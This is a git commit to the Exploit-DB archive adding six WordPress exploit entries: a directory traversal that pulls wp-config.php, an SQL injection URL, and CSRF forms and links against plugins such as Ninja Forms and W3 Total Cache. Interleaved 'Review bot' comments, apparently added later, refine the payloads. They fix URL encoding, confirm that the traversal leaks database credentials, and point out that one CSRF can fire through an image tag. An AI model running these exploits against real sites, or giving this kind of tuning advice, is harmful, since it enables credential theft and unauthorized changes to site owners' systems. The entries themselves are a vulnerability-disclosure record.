DB: 2016-01-25

6 new exploits
Offensive Security 2016-01-25 05:02:02 +00:00
parent 73e749c845
commit 5f07a690c4
7 changed files with 73 additions and 0 deletions

@ -35539,3 +35539,9 @@ id,file,description,date,author,platform,type,port
39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin 'facebook.php' SQL Injection Vulnerability",2014-09-07,"Claudio Viviani",php,webapps,0
39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms Plugin Authorization Bypass Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin Authorization Bypass Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin 'admin.php' Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
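Review bot: the added row 39299 repeats the "Vulnerabilitiy" misspelling from the three context rows 39296-39298 directly above it; correct the new line to "Arbitrary File Download Vulnerability" before this lands (and fix the three existing rows in a follow-up), since the description column is what searches match on. Rows 39301 and 39302 are typed as "Authorization Bypass" while 39303 and 39304, from the same author and date, are "Cross Site Request Forgery"; the PoC files added for 39301 and 39302 later in this commit are cross-site HTML forms posting to admin-ajax.php, so the Voxel@Night batch should be catalogued consistently or the difference explained.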

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/69673/info
Antioch theme for Wordpress is prone to an arbitrary file-download vulnerability.
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
http://www.example.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
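Review bot: this entry gives no affected theme version, unlike the other five advisories in this commit, so a reader cannot tell whether a fixed release exists; add the version tested (or state that it is unknown) above the PoC URL. The traversal depth checks out: five `../` from `wp-content/themes/antioch/lib/scripts/` resolve to the WordPress root, which is where wp-config.php sits, so the PoC hands over the database credentials on a vulnerable install, and the description would be more useful saying that than the generic "potentially sensitive information".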

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/69675/info
Spider Facebook plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Spider Facebook 1.0.8 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2
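Review bot: the PoC URL on the last line carries literal spaces in `id=1 and 1=2`, which many clients will not encode and which truncates the request; write it as `id=1%20and%201=2` so it arrives intact. The target is `wp-admin/admin.php?page=Spider_Facebook_manage`, the plugin's own admin menu, so the injection is only reachable by a logged-in user who can open that page; state that prerequisite next to the version line (1.0.8). A boolean test also needs a reference point: document the expected difference between `id=1 and 1=1` and `id=1 and 1=2` so a tester can confirm the injection rather than guess from one response.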

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/69740/info
The Ninja Forms Plugin for WordPress is prone to an authorization-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
Ninja Forms Plugin 2.7.7 is vulnerable; other versions may also be affected.
<html><body>
<form action="http://www.example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
form id: <input name="form_id" value="1"><br>
action: <input name="action" value="ninja_forms_delete_form">
<input type="submit" value="submit">
</form>
</body></html>
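Review bot: the form posts `action=ninja_forms_delete_form` with `form_id=1` to admin-ajax.php and carries no nonce field, which is a CSRF-shaped PoC rather than a demonstration that the handler skips its capability check; the advisory should say which user, if any, must be logged in when the form is submitted and what the handler does (or does not) verify, otherwise "authorization bypass" is ambiguous. Also state that submitting it deletes form 1 on the target, so it is destructive and should be pointed at a throwaway form.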

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/69741/info
WP to Twitter Plugin for WordPress is prone to an authorization-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
WP to Twitter 2.9.3 is vulnerable; other versions may also be affected.
<html><body>
<form method="post" action="http://www.example.com/wordpress/wp-admin/admin-ajax.php">
action:<input name="action" value="wpt_tweet"><br>
tweet action:<input name="tweet_action" value="tweet"><br>
tweet text: <input value="" name="tweet_text"><br>
tweet schedule: <input value="undefined+undefined" name="tweet_schedule"><br>
tweet post id: <input value="1" name="tweet_post_id"><br>
<input type="submit" value="Submit">
</form>
</body></html>
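Review bot: `tweet_text` is submitted empty and `tweet_schedule` is `undefined+undefined`, which looks like field values captured from the plugin's JavaScript with nothing filled in rather than a deliberate payload; set `tweet_text` to a marker string so the tester can see the forged tweet, and say whether the `wpt_tweet` handler requires `tweet_schedule` or whether it can be dropped. As with the Ninja Forms entry, the form posts to admin-ajax.php with no nonce, so the note should state which logged-in role the victim needs for the action to succeed.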

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/69744/info
Xhanch My Twitter plugin for WordPress is prone to a cross-site request-forgery vulnerability.
An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
Xhanch My Twitter 2.7.7 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/?xmt_Primary_twt_id=508351521810300928
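Review bot: the PoC is a single GET to the site front page with `xmt_Primary_twt_id=508351521810300928`, but the entry never says what state that request changes or which logged-in role the victim must hold, so there is no way to verify success; add a sentence on the observable effect and where to look afterwards. A state-changing GET handled on the front page can be triggered from an image tag, which makes this easier to deliver than the POST-form PoCs elsewhere in this commit and is worth calling out.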

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/69745/info
W3 Total Cache plugin for WordPress is prone to a cross-site request-forgery vulnerability.
An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
W3 Total Cache 0.9.4 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-admin/admin.php?page=w3tc_general&w3tc_note=enabled_edge
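Review bot: the request `admin.php?page=w3tc_general&w3tc_note=enabled_edge` is a GET to the plugin's settings page, and the parameter name reads as though it only sets or dismisses a notice rather than changing a cache setting; the advisory should state what actually changes, because a CSRF that dismisses an admin notice is a very different severity from one that alters cache configuration. Add the role requirement (the page lives under wp-admin, so a logged-in administrator has to visit the link) so readers do not assume an unauthenticated impact.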